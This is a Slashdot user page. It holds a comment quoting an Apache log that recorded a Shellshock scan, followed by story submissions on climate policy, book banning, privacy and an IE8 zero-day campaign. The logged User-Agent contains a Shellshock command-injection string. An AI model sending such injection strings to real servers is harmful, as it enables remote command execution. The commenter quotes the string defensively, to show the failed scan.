
Comment: Re:Only the beginning (Score 3, Informative) 236

by geckoFeet (#47999635) Attached to: First Shellshock Botnet Attacking Akamai, US DoD Networks

Yay! I have been scanned - but my little webserver doesn't run any cgi scripts, so they got 404'd. They were looking specifically for defaultwebpage.cgi:

root@stinky:/home/gecko# grep cgi /var/log/apache2/access*|egrep "};|}\s*;"
/var/log/apache2/access.log: - - [25/Sep/2014:02:28:52 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 319 "-" "() { :;}; /bin/ping -c 1"

+ - Britain's Costliest Mistake?-> 2

Submitted by RoccamOccam
RoccamOccam (953524) writes "Five years after UK passage of the 2008 Climate Change Act, the chief proponent of the act, Nick Stern, has responded to "A Review of the Stern Review". The "Stern Review" was a massive economic assessment that helped convince Parliament that climate mitigation measures would be worth the cost.

The result was quite possibly the most expensive legislation ever passed by Parliament. However, it appears that Stern’s analysis may have been deeply flawed."


+ - The Shadowy Darknet will be the Only Truly World-wide Web->

Submitted by DavidGilbert99
DavidGilbert99 (2607235) writes "“The shadowy Darknet then will be the only truly world-wide web” — this is the view of Alexander Gostev, chief security expert at Kaspersky Lab who believes the fallout from Edward Snowden's leaks may lead at some point to the "collapse of the current Internet, which will break into dozens of national networks.""

+ - Increasing Number of Books Banned in the USA->

Submitted by vikingpower
vikingpower (768921) writes "Isabel Allende's The House of The Spirits. Sherman Alexie's The Absolutely True Diary of a Part-Time Indian. Alice Walker's The Color Purple. Toni Morrison's The Bluest Eye. Ralph Ellison's The Invisible Man.

What do all these titles have in common with each other? Exactly, they are banned somewhere, at some school, in the USA. Yes, in 2013. A project named The Kids' Right to Read (by the National Coalition Against Censorship) investigated three times the average number of incidents, adding to an overall rise in cases for the entire year, according to KRRP coordinator Acacia O'Connor. To date, KRRP has confronted 49 incidents in 29 states this year, a 53% increase in activity from 2012. During the second half of 2013, the project battled 31 new incidents, compared to only 14 in the same period last year.

"It has been a sprint since the beginning of the school year," O'Connor said. "We would settle one issue and wake up the next morning to find out another book was on the chopping block."

The NCAC also offers a Book Censorship Toolkit on its website. If such a toolkit is needed at all, does this indicate that intellectual freedom and free speech are (slowly) eroding in the USA?"


+ - Samsung Galaxy S4 Security Vulnerability->

Submitted by olsmeister
olsmeister (1488789) writes "The Samsung KNOX enterprise security system (presumably a play on Ft Knox, the location of the United States Bullion Depository) contains a security vulnerability that could put both personal and business data at risk. This is according to a discovery by a Ph.D. student at the Ben Gurion University of the Negev in Israel. This is the security system used in Samsung's flagship Galaxy S4 phone, which Samsung hopes will allow it to compete with BlackBerry in government and enterprise applications. The flaw could allow attackers to access secure data, as well as load malicious applications."

+ - Medical records given to pharmacies are not constitutionally protected, says DEA-> 1

Submitted by schwit1
schwit1 (797399) writes "Like emails and documents stored in the cloud, your prescription medical records may have a tenuous right to privacy. In response to a lawsuit filed by the American Civil Liberties Union (ACLU) over the privacy of certain medical records, the US Drug Enforcement Administration (DEA) is arguing that citizens whose medical records are handed over to a pharmacy — or any other third-party — have "no expectation of privacy" for that information."

+ - Middle-click Paste? Not For Long

Submitted by Anonymous Coward
An anonymous reader writes "Select to copy and middle-click to paste. That's a very convenient usability feature associated with UNIX graphical environments. But it is confusing for new users, so the ability to middle-click paste was briefly removed from GNOME 3.10. It was restored a few days later, but with a clear message: middle-click paste will be permanently removed from the next GNOME version."

+ - How Old is the Average Country?->

Submitted by Daniel_Stuckey
Daniel_Stuckey (2647775) writes "I've crashed quite a few birthday parties lately, which has led to me not only botching the lyrics and the cadence of each birthday song, but also guessing how old everyone is I'm hanging out with. Today is the United States' 237th birthday. And while people often remark that America is pretty young compared to other countries, aren't they actually flattering the 22nd oldest country in the world?

I did some calculations in Excel, using independence dates provided on, and found the average age of a country is about 158.78 years old. Now, before anyone throws a tizzy about what makes a country a country, about nations, tribes, civilizations, ethnic categories, or about my makeshift methodology, keep in mind, I simply assessed 195 countries based on their political sovereignty. That is the occasion we're celebrating today, right? Try this map.


+ - Internet Explorer 0-day attacks on US nuke workers hit 9 other sites->

Submitted by SternisheFan
SternisheFan (2529412) writes "Ars reports:

Attacks exploiting a previously unknown and currently unpatched vulnerability in Microsoft's Internet Explorer browser have spread to at least nine other websites, including those run by a big European company operating in the aerospace, defense, and security industries as well as non-profit groups and institutes, security researchers said.

The revelation, from a blog post published Sunday by security firm AlienVault, means an attack campaign that surreptitiously installed malware on the computers of federal government workers involved in nuclear weapons research was broader and more ambitious than previously thought. Earlier reports identified only a website belonging to the US Department of Labor as redirecting to servers that exploited the zero-day remote-code vulnerability in IE version 8.

A separate blog post from security firm CrowdStrike said its researchers unearthed evidence suggesting that the campaign began in mid-March. Their analysis of logs from the malicious infrastructure used in the attacks revealed the IP addresses of visitors to the compromised sites. The logs showed addresses from 37 different countries, with 71 percent of them in the US, 11 percent in South/Southeast Asia, and 10 percent in Europe. CrowdStrike's data showed IP addresses before exploit code was run against the visitors' machines. Not all those visitors were likely compromised since the exploit code worked only against people using IE8.

CrowdStrike researchers seemed to concur with their counterparts from Invincea, who—as Ars reported on Friday—said the attacks at least in part targeted people working on sensitive government programs. Malicious links embedded in the Department of Labor website focused on webpages that dealt with illnesses suffered by employees and contractors developing atomic weapons for the Department of Energy. But they went on to say the campaign could be much broader.

"The specific Department of Labor website that was compromised provides information on a compensation program for energy workers who were exposed to uranium," CrowdStrike said. "Likely targets of interest for this site include energy-related US government entities, energy companies, and possibly companies in the extractive sector. Based on the other compromised sites other targeted entities are likely to include those interested in labor, international health and political issues, as well as entities in the defense sector."

Such "watering hole" attacks—which plant malware exploits on websites that are frequented by specific groups or people—have become a common technique in targeted attacks. Once compromised by the IE zero-day, computers are infected with a version of Poison Ivy, a backdoor tool that has been widely used in past espionage campaigns. The command-and-control servers used to communicate with infected machines show signs that they were set up by a Chinese hacking crew known as DeepPanda.

Microsoft confirmed the remote code-execution vulnerability on Friday night. Versions 6, 7, 9, and 10 of the browser are immune to these attacks, so anyone who can upgrade to one of the latest two versions should do so immediately or switch to a different browser. For anyone who absolutely can not move away from IE 8, company researchers recommend the following precautions:

Set Internet and local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones. This will help prevent exploitation but may affect usability; therefore, trusted sites should be added to the Internet Explorer Trusted Sites zone to minimize disruption.

Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and local intranet security zones. This will help prevent exploitation but can affect usability, so trusted sites should be added to the Internet Explorer Trusted Sites zone to minimize disruption.

Users can also install EMET—short for Enhanced Mitigation Experience Toolkit—which adds a variety of exploit mitigations and security defenses and is especially useful for users of older versions of Windows, such as XP.

Technical details about the "use after free" bug are available here from Rapid7. The security firm has already folded attack code exploiting the vulnerability into the Metasploit framework used by security professionals and hackers. Researchers at FireEye have also delved into the exploit circulating online. They found it uses "return oriented programming," a technique used to defeat data-execution prevention and other exploit mitigations. The FireEye researchers said they also verified the exploit works against IE8 on Windows 7.

Microsoft's advisory on Friday said researchers were still investigating the vulnerability. When the inquiry concludes, they will decide whether to release an unscheduled update or provide a fix as part of the company's regular patching cycle. Story updated to add details from FireEye in second-to-last paragraph"
